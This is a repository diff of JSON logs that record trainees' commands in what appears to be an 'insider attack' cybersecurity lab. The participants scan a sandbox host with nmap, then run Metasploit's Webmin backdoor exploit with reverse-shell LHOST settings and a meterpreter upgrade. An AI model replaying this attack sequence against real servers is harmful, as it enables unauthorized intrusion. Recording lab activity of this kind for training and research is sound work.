Loading 2022-11-00 Insider-attack/results-ok/logs/sandbox-120-useractions.json 0 → 100644 +128 −0 File added.Preview size limit exceeded, changes collapsed. Show changes 2022-11-00 Insider-attack/results-ok/logs/sandbox-121-useractions.json 0 → 100644 +21 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:25.204053Z","sandbox_id":"121","cmd":"arp -a","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:43.505108Z","sandbox_id":"121","cmd":"arp -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:16:12.058068Z","sandbox_id":"121","cmd":"nmap","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:03.791263Z","sandbox_id":"121","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:38.274642Z","sandbox_id":"121","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:18:04.146486Z","sandbox_id":"121","cmd":"nmap -vv 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:20:58.231984Z","sandbox_id":"121","cmd":"nmap -vv -sP 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:22:13.922917Z","sandbox_id":"121","cmd":"nmap -vv -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:23:11.620893Z","sandbox_id":"121","cmd":"nmap -vv --allports -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:42:54.545964Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:02.664855Z","sandbox_id":"121","cmd":"msfconsole -help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:06.950533Z","sandbox_id":"121","cmd":"msfconsole --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:16.031570Z","sandbox_id":"121","cmd":"msfconsole -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:54.106156Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:19.703840Z","sandbox_id":"121","cmd":"connext 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:24.339129Z","sandbox_id":"121","cmd":"connect 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:50:05.007653Z","sandbox_id":"121","cmd":"connect 172.18.1.5 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:51:57.889520Z","sandbox_id":"121","cmd":"use exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:32.193250Z","sandbox_id":"121","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:42.010085Z","sandbox_id":"121","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:55.919979Z","sandbox_id":"121","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-123-useractions.json 0 → 100644 +26 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:50:43.709381Z","sandbox_id":"123","cmd":"ping 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:16.328697Z","sandbox_id":"123","cmd":"nmap help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:20.147310Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:27.296503Z","sandbox_id":"123","cmd":"clear","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:28.231953Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:55:14.616800Z","sandbox_id":"123","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:57:33.497027Z","sandbox_id":"123","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:20.874488Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 22","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:39.444274Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:47.627591Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:53.879278Z","sandbox_id":"123","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:56.315315Z","sandbox_id":"123","cmd":"ls /","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:09:24.017652Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:19.379669Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:34.620924Z","sandbox_id":"123","cmd":"RHOST","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:39.842294Z","sandbox_id":"123","cmd":"RHOSTS","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:49.211873Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:56.673791Z","sandbox_id":"123","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:11:02.890911Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:04.840603Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:25.936841Z","sandbox_id":"123","cmd":"path-to-exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:41.334465Z","sandbox_id":"123","cmd":"expoit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:53.767159Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:01.249877Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:07.120898Z","sandbox_id":"123","cmd":"set RPORTS 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:13.691804Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-124-useractions.json 0 → 100644 +53 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:01.081260Z","sandbox_id":"124","cmd":"nmap -Ov 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:11.248131Z","sandbox_id":"124","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:43.272688Z","sandbox_id":"124","cmd":"nmap -V -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:54.962573Z","sandbox_id":"124","cmd":"nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:58.143386Z","sandbox_id":"124","cmd":"sudo nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:03:19.901139Z","sandbox_id":"124","cmd":"sudo nmap -sV -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:04:12.554536Z","sandbox_id":"124","cmd":"sudo nmap -O 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:05:12.781849Z","sandbox_id":"124","cmd":"curl -Lk 172.18.1.5:10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:07:53.495812Z","sandbox_id":"124","cmd":"snet-sensor-mgmt","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:02.093457Z","sandbox_id":"124","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:05.317723Z","sandbox_id":"124","cmd":"man curl","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:34.431155Z","sandbox_id":"124","cmd":"man passwd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:59.617131Z","sandbox_id":"124","cmd":"passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:20.433921Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:27.006518Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:42.436820Z","sandbox_id":"124","cmd":"chgpasswd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:27.105568Z","sandbox_id":"124","cmd":"metasploit","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:36.681270Z","sandbox_id":"124","cmd":"ls /bin","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:08.497464Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:15.546639Z","sandbox_id":"124","cmd":"man msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:36.045329Z","sandbox_id":"124","cmd":"man msfvenom","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:47.639167Z","sandbox_id":"124","cmd":"msf","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:49.960270Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:36.345571Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:54.097039Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:15.188181Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:31.171737Z","sandbox_id":"124","cmd":"set RHOSTS=172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:36.843859Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:10.680011Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:12.790210Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:26.164691Z","sandbox_id":"124","cmd":"info 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:57.098112Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:30.780366Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:14.357116Z","sandbox_id":"124","cmd":"set LHOST 127.0.0.1","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:23.661702Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:07.545146Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:17.641556Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:31.133251Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:12.737289Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:29.578848Z","sandbox_id":"124","cmd":"use post/multi/manage/shell_to_meterpreter","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:32.546857Z","sandbox_id":"124","cmd":"session -l","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:38.249728Z","sandbox_id":"124","cmd":"exit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:39.340080Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:52.022503Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:56.191182Z","sandbox_id":"124","cmd":"5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:59.378217Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:02.308571Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:14.278996Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:16.962308Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:35.811474Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:46.206315Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:58.398985Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:39:04.339243Z","sandbox_id":"124","cmd":"set LHOST eth1","pool_id":"26","cmd_type":"msf-command"} 2022-11-00 Insider-attack/results-ok/logs/sandbox-125-useractions.json 0 → 100644 +20 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:14:29.279655Z","sandbox_id":"125","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:16:28.428766Z","sandbox_id":"125","cmd":"ssh 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:17:29.531158Z","sandbox_id":"125","cmd":"nmap -p- 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:12.119723Z","sandbox_id":"125","cmd":"v","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:20.645641Z","sandbox_id":"125","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:59.242225Z","sandbox_id":"125","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:06.864747Z","sandbox_id":"125","cmd":"python ssh2john.py","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:52.036898Z","sandbox_id":"125","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:12.692132Z","sandbox_id":"125","cmd":"help","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:34.509328Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:42.757532Z","sandbox_id":"125","pool_id":"26","cmd_type":"msf-command","tags":["_jsonparsefailure"]} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:50.717307Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:55.186929Z","sandbox_id":"125","cmd":"info 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:04.332580Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:07.976763Z","sandbox_id":"125","cmd":"use 0","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:27.968897Z","sandbox_id":"125","cmd":"show options","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:46.009119Z","sandbox_id":"125","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:56.254909Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:33.974672Z","sandbox_id":"125","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:43:20.146042Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"} Loading
2022-11-00 Insider-attack/results-ok/logs/sandbox-120-useractions.json 0 → 100644 +128 −0 File added.Preview size limit exceeded, changes collapsed. Show changes
2022-11-00 Insider-attack/results-ok/logs/sandbox-121-useractions.json 0 → 100644 +21 −0 Original line number Diff line number Diff line {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:25.204053Z","sandbox_id":"121","cmd":"arp -a","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:13:43.505108Z","sandbox_id":"121","cmd":"arp -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:16:12.058068Z","sandbox_id":"121","cmd":"nmap","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:03.791263Z","sandbox_id":"121","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:17:38.274642Z","sandbox_id":"121","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:18:04.146486Z","sandbox_id":"121","cmd":"nmap -vv 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:20:58.231984Z","sandbox_id":"121","cmd":"nmap -vv -sP 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:22:13.922917Z","sandbox_id":"121","cmd":"nmap -vv -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:23:11.620893Z","sandbox_id":"121","cmd":"nmap -vv --allports -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:42:54.545964Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:02.664855Z","sandbox_id":"121","cmd":"msfconsole -help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:06.950533Z","sandbox_id":"121","cmd":"msfconsole --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:16.031570Z","sandbox_id":"121","cmd":"msfconsole -h","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:43:54.106156Z","sandbox_id":"121","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:19.703840Z","sandbox_id":"121","cmd":"connext 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:49:24.339129Z","sandbox_id":"121","cmd":"connect 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:50:05.007653Z","sandbox_id":"121","cmd":"connect 172.18.1.5 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:51:57.889520Z","sandbox_id":"121","cmd":"use exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:32.193250Z","sandbox_id":"121","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:42.010085Z","sandbox_id":"121","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"} {"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:55.919979Z","sandbox_id":"121","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}
